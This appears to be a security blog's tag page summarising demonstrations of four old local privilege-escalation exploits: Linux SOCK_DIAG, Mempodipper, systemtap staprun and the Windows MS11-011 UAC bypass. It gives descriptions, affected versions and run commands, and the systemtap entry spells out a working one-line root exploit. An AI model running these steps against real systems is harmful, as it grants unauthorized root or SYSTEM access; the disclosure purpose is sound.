Posts tagged Kernel

CVE-2013-1763 SOCK_DIAG vulnerability in Linux kernel 3.3 to 3.8 Demo

16

Timeline :

Vulnerability discovered and reported to the vendor by Mathias Krause the 2013-02-23
PoC provided the 2013-02-25

PoC provided by :

Mathias Krause
SynQ

Reference(s) :

CVE-2013-1763

Affected version(s) :

Linux Kernel 3.3 to 3.8

Tested on Ubuntu 12.10 x86 with :

Kernel 3.5.0-17-generic

Description :

Userland can send a netlink message requesting SOCK_DIAG_BY_FAMILY with a family greater or equal then AF_MAX — the array size of sock_diag_handlers[]. The current code does not test for this condition therefore is vulnerable to an out-of-bound access opening doors for a privilege escalation.

Commands :

id
gcc -o CVE-2013-1763 CVE-2013-1763.c
./CVE-2013-1763 Ubuntu
id

CVE-2012-0056 Mempodipper Linux Local Root Exploit Demo

0

Timeline :

Vulnerability discovered by zx2c4 (Jason A. Donenfeld)
Public release of the vulnerability the 2012-01-18
Exploit provided the 2012-01-23

PoC provided by :

zx2c4 (Jason A. Donenfeld)

Reference(s) :

CVE-2012-0056
EBD-ID-18411

Affected version(s) :

Linux kernel’s above or equal to 2.6.39 (32 bit or 64 bit).

Tested on Ubuntu 11.10 with :

Linux ubuntu 3.0.0-15-generic

Description :

Mempodipper is an exploit for CVE-2012-0056 exploiting an issue in the handling of the /proc/pid/mem writing functionality, where permissions are not being properly checked in the Linux kernel version 2.6.39 to current. A local, unprivileged user could use this flaw to escalate their privileges.

Commands :

whoami
gcc -o CVE-2012-0056-Mempodipper CVE-2012-0056-Mempodipper.c
./CVE-2012-0056-Mempodipper
whoami

CVE-2010-4170 : systemtap Local Root Privilege Escalation Vulnerability

2

Timeline :

Vulnerability reported to vendors, by Tavis Ormandy, the 2010-11-15
Vulnerability corrected by vendors around the 2010-11-17

PoC provided by :

Tavis Ormandy

Reference(s) :

CVE-2010-4170

Affected version(s) :

Red Hat, Fedora, Debian, Ubuntu, etc.

Tested on Debian squeeze/sid with :

systemtap-runtime_1.0-2_i386.deb

Description :

It was discovered that staprun did not properly sanitize the environment before executing the modprobe command to load an additional kernel module. A local, unprivileged user could use this flaw to escalate their privileges.

Commands :

Require “systemtap-runtime” on Debian

id
printf “install uprobes /bin/sh” exploit.conf; MODPROBE_OPTIONS=”-C exploit.conf” staprun -u whatever
id

MS11-011 : Windows UAC Bypass 0day

0

Timeline :

Vulnerability released by noobpwnftw the 2010-11-24

PoC provided by :

noobpwnftw

Reference(s) :

CVE-2010-4398
EBD-ID-15609
MS11-011

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 SP1 and Windows Vista x64 SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2
Windows 7 32
Windows 7 x64
Windows Server 2008 R2 x64

Tested on Windows 7 Integral

Description :

Microsoft Windows does not adequately validate registry data read using the function RtlQueryRegistryValues(). By modifying an EUDC registry key value, a local user could execute arbitrary code with SYSTEM privileges.

Commands :

whoami
poc.exe
whoami

Go to Top